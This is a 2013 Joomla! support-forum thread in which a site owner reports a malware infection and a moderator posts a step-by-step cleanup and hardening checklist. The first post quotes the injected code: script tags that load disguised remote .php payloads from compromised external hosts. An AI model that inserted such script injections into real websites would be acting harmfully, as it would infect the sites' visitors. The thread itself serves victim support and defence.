Malware

Discussion regarding Joomla! 1.5 security issues.
Joomla! Vulnerable Extensions: http://feeds.joomla.org/JoomlaSecurityV ... Extensions

Moderator: General Support Moderators

Forum rules
Forum Rules
Absolute Beginner's Guide to Joomla! <-- please read before posting, this means YOU.
Security Checklist
Forum Post Assistant - If you are serious about wanting help, you will use this tool to help you post.
Locked
RemyJ
Joomla! Fledgling
Joomla! Fledgling
Posts: 2
Joined: Fri Jun 07, 2013 10:43 am

Malware

Post by RemyJ » Fri Jun 07, 2013 10:54 am

Hello,

A year ago i have bought a template @ template monster.com this template is installed correctly and has run a year without having any problems. Now since 2 days ago i can't reach my website in case of Malware detection. I have submitted the website too the webmaster tools in google and saw that they had found a suspiciouse piece of code which infects my website.

(Suspiciouse Code)

Code: Select all

<script type="text/javascript" src="http://sodiummetal .com/wp-content/plugins/wp_modx/jquery-1.6.5.min.php"></script><script type="text/javascript" src="http://www.thaiathome .fr/wp-content/plugins/wp_api/jquery-1.6.4.min.php"></script></head>
Almost on every php file i have deleted this code to make sure the malware is gone. Only its only getting worse. I have several website running on Joomla. This template is still running on Joomla 1.5.26 i know everyone is going to say that updating the joomla platform is neccesary only i dont have a clue on how to convert this template too 2.5 as we have bought it a year ago.

But not only this template is showing this code inside php files etc, also other sites on the same server with joomla versions of 2.5 are showing these code inside the files.

Chrome blocked my site for viewers because users could be infected also. Is there somebody that can tell me what i can do to make my site work again and howto remove all the code. I have looked in every file to search this code but maybe im still missing things i oversee.

Hopefully anyone could give me a hint in the right direction to clean up my website so that i can send a research request to remove the mallware label.

Kind regards ;

Remy
Last edited by mandville on Fri Jun 07, 2013 2:42 pm, edited 1 time in total.
Reason: broke link

User avatar
subrat
Joomla! Ace
Joomla! Ace
Posts: 1038
Joined: Sat Jul 08, 2006 7:36 am
Location: India
Contact:

Re: Malware

Post by subrat » Fri Jun 07, 2013 1:21 pm

please send us the url to the website so that we can have a look.
Quality WebDevelopment at http://www.webworkwiz.com
Affordable hosting http://www.vsmhosting.com

User avatar
mandville
Joomla! Master
Joomla! Master
Posts: 15002
Joined: Mon Mar 20, 2006 1:56 am
Location: The Girly Side of Joomla in Sussex

Re: Malware

Post by mandville » Fri Jun 07, 2013 2:40 pm

[ ] Download and RUN the Forum Post Assistant / FPA Instructions available here and are also included in the download package. Post the generated results in your security/been hacked topic. Use these links to download the FPA:
Download .tar.gz version or Download the .zip version NOTE: Do not download the FPA from any other website or links found on the Internet.

[ ] Ensure you have the latest version of Joomla for your version of Joomla. Delete all files in your Joomla installation, saving a copy of the configuration.php file.

[ ] Review Vulnerable Extensions List to make sure any 3rd party extensions versions used appear on the vulnerable list.

[ ] Review and action Security Checklist 7 Make sure you've gone through all of the steps.

[ ] Scan all machines with FTP, Joomla super admin, and Joomla admin access for malware, virus, trojans, spyware, etc. Checklist 7 contains a list or recommended scanners.

[ ] Change all passwords and if possible user names for the website host control panel. Change the Joomla database user name and password.

[ ] Use proper permissions on files and directories. They should never be 777, ideal is 644 for files and 755 for directories. The configuration file can be set to 444 which is read only.

[ ] Check your htaccess for for any odd code (i.e. code which is not in the standard htaccess supplied as part of the Joomla installation).

[ ] Check the crontab or Task Scheduler for unexpected jobs/tasks.

[ ] Ensure you do not have anonymous ftp enabled.

[ ] Verify individually that any non-Joomla file such as but not limited to that will be placed back on the website such as images, pdf files, files for download, and other documents and files are valid and are supposed to be part of your website.

[ ] Replace the deleted files with fresh copies of a current full version of Joomla (minus the installation directory) you downloaded earlier. Install freshly downloaded copies of any extensions and templates used on the site. If the Joomla database user name and password were changed earlier, then make the necessary changes to the configuration.php file and upload a copy to the website. Upload any non-Joomla files that are necessary for your website. Only by replacing all files in the installation (including extensions and templates) can you be sure to remove the backdoors inserted and hidden in various files and directories More detailed information can be found in the Security Checklist 7 document.
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}

RemyJ
Joomla! Fledgling
Joomla! Fledgling
Posts: 2
Joined: Fri Jun 07, 2013 10:43 am

Re: Malware

Post by RemyJ » Sat Jun 08, 2013 2:38 pm

Hello,

Still having problems with this code inside every file in my joomla installation.
Im also finding this stuff in the Joomla Administration directory, which infects my KCEditor.
subrat wrote:please send us the url to the website so that we can have a look.
http://www.pinghosting .nl

It seems as the malware reaching more domains on this webserver. I have scanned the webserver ip adress and noticed there are more website with malware problems.
Last edited by mandville on Sat Jun 08, 2013 2:59 pm, edited 1 time in total.
Reason: broke link. posting links to infected can be a moral and legal danger


Locked

Return to “Security in Joomla! 1.5”